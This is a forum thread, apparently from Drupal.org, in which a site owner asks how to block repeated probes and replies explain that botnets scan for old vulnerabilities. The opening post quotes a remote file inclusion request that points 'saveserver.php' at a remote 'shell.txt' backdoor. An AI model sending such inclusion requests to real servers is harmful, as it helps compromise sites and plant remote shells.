Bad guy, very very bad guy
Hi all,
Every now and then, I get a visitor from this location:
http://my_ip_number/admin/business_inc/saveserver.php?thisdir=http://som...?
(I'm a bit hesitant to disclose the name of this some_dutch_site and some_dutch_person, because when I visit that site without the shell.txt in the url, I get some sort of very decent graphics artist, nothing suspicious. My hunch is that this guy doesn't even know his url is being misused by the character who put that shell.txt on his site. Could be wrong here, but that's my feeling).
The ip from which this visit originates, is different: the first time it came from Taiwan, then from France, and now it comes from Nebraska, from the "Phillips Manufacturing Company".
I have done some googling on "saveserver.php", and from what I understand, it tries to exploit an inclusion vulnerability in some server setup.
I also read the "shell.txt" from my visitor's url. My antivirus program protested, because it included some Backdoor (something) virus. I did manage to read the .txt file, however, and from glancing through it, I'd say it tries to collect a multitude of information from any site it gets access to.
Luckily, my Drupal guided this apparently unwanted visitor to an "Access Denied" page. Obviously, there is no admin/business_inc folder in my (or any Drupal) setup.
My question: I can't block this character on an IP-basis, because the IP number changes every time. There is, however, a consistency in the location (see top). Can I make some access rule or anything kicking this fellow to the moon, on the basis of the location string? E.g.: can I make something which keeps anything with "saveserver.php" in the url far away from my site?
I don't think there is any immediate danger, but I don't like this type of buggers. So, if anyone could help me getting visited by them, I'd be Very Thankful!
Drupal.org broke the naughty
Drupal.org broke the naughty url a bit too soon. Here it is again, in pieces:
http://my_sites_ip_number/admin/business_inc/saveserver.php?thisdir=
http://some_dutch_site/some_dutch_person/shell.txt?
Obviously, the last sentence
Obviously, the last sentence should read: "If anyone could help me NOT getting visited by them..." :-)
Anyway, the request still stands: any clues, anyone, on keeping these scumbags in their holes?
I get those
I get someone that is advertising a drug on my chat room registration. I know I should block it, but it never shows up in the data base, not really sure why. The Chat room that it shows up on, sometimes 3 or 4 times a day, requires registration, and I can't find it to block it.
Have not had that on the drupal sites as yet, cuz they aren't being released yet. Will keep you posted if they do.
www.sueswebdesigns.suesman.net
bastards
unfortunately, that's just background noise, and it'll always be there.
It's just a robot (part of a botnet I imagine) randomly scanning the entire web for known vulnerabilities on old sites.
Simply, because your site doesn't respond to 'saveserver.php', the probe fails, and it moves on the the next potential victim. There are a hundred or so potential requests that the bots may choose to make (such as direct calls to unpatched IIS DLLs, upload scripts on older cgi tools etc) and several million bots out there.
It's neither you, nor the incoming IP (a compromised bot), nor the targeted Dutch site that's responsible or can do much about it.
BUT if you actually got something back from the shell.txt request when you went looking, it means that the Dutch site has already been compromised and is being used as a step in a chain. It would be nice to drop him an email and let him know to delete it!
.dan.
How to troubleshoot Drupal | http://www.coders.co.nz/